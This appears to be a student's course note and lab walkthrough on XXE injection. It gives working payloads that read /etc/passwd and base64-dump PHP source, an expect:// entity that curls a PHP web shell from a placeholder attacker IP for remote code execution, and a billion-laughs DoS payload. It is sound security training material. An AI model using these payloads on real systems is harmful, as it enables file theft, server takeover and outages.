14 - Local File Disclosure

- When a web app trusts unfiltered XML data from user input, we may be able to reference an external XML DTD document and define new custom XML entities # Identifying - First, we need to find web pages that accept an XML user input - If we fill the contact form below and click on `Send Data` ![[images/Pasted image 20260113192501.png]] - If we intercept the request we see that the form is sending our data as XML in a POST request ![[images/Pasted image 20260113192457.png]] - This a potential XXE testing target - Suppose the web app uses outdated XML libraries, and it does not apply any filters or sanitization on our XML input - In such a case, we may be able to exploit this XML form to read local files - However, if we forward the test request. we see that the value of the `email` element is be reflected ![[images/Pasted image 20260113192636.png]] - So now we know that whatever value we place in the `<email></email>` element gets displayed in the HTTP response - So, let us try to define a new entity and then use it as a variable in the `email` element to see whether it gets replaced with the value we defined - To do so, we can use what we learned in the previous section for defining new XML entities and add the following lines after the first line in the XML input ```xml <!DOCTYPE email [ <!ENTITY company "Inlane Freight"> ]> ``` - NOTE: If the `DOCTYPE` was already declared in the XML request, we would just add the `ENTITY` element to it - Now we should have a new XML entity called `company`, which we can reference with `&company;` - So, instead of using our email in the `email` element, let us try using `&company` in the form ![[images/Pasted image 20260113192925.png]] - Because we are getting the value we defined for the `&company` XML entity, we know that we are able to inject xml code - In contrast, a non-vulnerable web application would display (`&company;`) as a raw value # Reading Sensitive Files - Now that we know that the web app is vulnerable to XXE, we can define other xml entities - Add the `SYSTEM` keyword and attempt to leake `/etc/passwd` with the below xml code ```xml <!DOCTYPE email [ <!ENTITY company SYSTEM "file:///etc/passwd"> ]> ``` - Intercept the request again or use `repeater` and modify as below for successful exploitation of the XXE vulnerability ![[images/Pasted image 20260113193334.png]] # Reading Source Code - We can use a similar approach as above to try to read source code for `index.php` - This attempt fails because the file we are referencing is not in a proper XML format, so it fails to be referenced as an XXE ![[images/Pasted image 20260113193719.png]] - If a file contains some of XML's special characters (e.g. `<`/`>`/`&`), it would break the external entity reference and not be used for the reference - We also cannot read binary data - We can use the php `filter` with base64 encoding in the xml code as a work around ```xml <!DOCTYPE email [ <!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]> ``` - Now we have the source code for `index.php` ![[images/Pasted image 20260113193857.png]] # RCE with XXE - The most efficient method to turn XXE into RCE is by fetching a web shell from our server and writing it to the web app, and then we can interact with it to execute commands - We can start by writing a basic PHP web shell and starting a python web server, as follows ```bash echo '<?php system($_REQUEST["cmd"]);?>' > shell.php sudo python3 -m http.server 80 ``` - Now we use the php `expect` wrapper to curl the php webshell within the xml code - Here spaces are replaced with `$IFS` to avoid breaking XML syntax - Other characters like `|`, `>`, and `{` may break the code, so we should avoid using them ```xml <?xml version="1.0"?> <!DOCTYPE email [ <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'"> ]> <root> <name></name> <tel></tel> <email>&company;</email> <message></message> </root> ``` # Other XXE Attacks - XXE vulns may also be leveraged to perform SSRF exploitation, which is used to enumerate locally open ports and access their pages, among other restricted web pages - Another common usage of XXE attacks is DoS'ing the hosting web server using the below xml payload ```xml <?xml version="1.0"?> <!DOCTYPE email [ <!ENTITY a0 "DOS" > <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"> <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"> <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"> <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;"> <!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;"> <!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;"> <!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;"> <!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;"> <!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;"> <!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;"> ]> <root> <name></name> <tel></tel> <email>&a10;</email> <message></mes ``` - This DoS attack no longer works with modern web servers (e.g., Apache), as they protect against entity self-reference # Exercise - `ping` test ![[images/Pasted image 20260113195053.png]] - `nmap` scan ![[images/Pasted image 20260113195140.png]]![[images/Pasted image 20260113195150.png]] - visit web page ![[images/Pasted image 20260113194948.png]] - provide test data and intercept ![[images/Pasted image 20260113195236.png]] - forward POST request - email is being reflected ![[images/Pasted image 20260113195303.png]] - send POST request to `repeater` - add `DOCTYPE` and `ENTITY` for testing, then reference the `&test` entity with below xml code ```xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE email [ <!ENTITY test "HELLO WORLD"> ]> <root> <name>test</name> <tel></tel> <email>&test;</email> <message>hello</message> </root> ``` - successful test ![[images/Pasted image 20260113195608.png]] - try to read `/etc/passwd` with below xml payload ```xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE email [ <!ENTITY test SYSTEM "file:///etc/passwd"> ]> <root> <name>test</name> <tel></tel> <email>&test;</email> <message>hello</message> </root> ``` - also successful ![[images/Pasted image 20260113195823.png]] - now attempt to read source code for `connection.php` by leveraging the php `filter` with base64 encoding with the below xml payload ```xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE email [ <!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=connection.php"> ]> <root> <name>test</name> <tel></tel> <email>&test;</email> <message>hello</message> </root> ``` - success! - highlight base64 encoded string and use `inspector` to view decoded `connection.php` file ![[images/Pasted image 20260113200218.png]] - alternatively we could send the base64 encoded string to `decoder` ![[images/Pasted image 20260113200238.png]]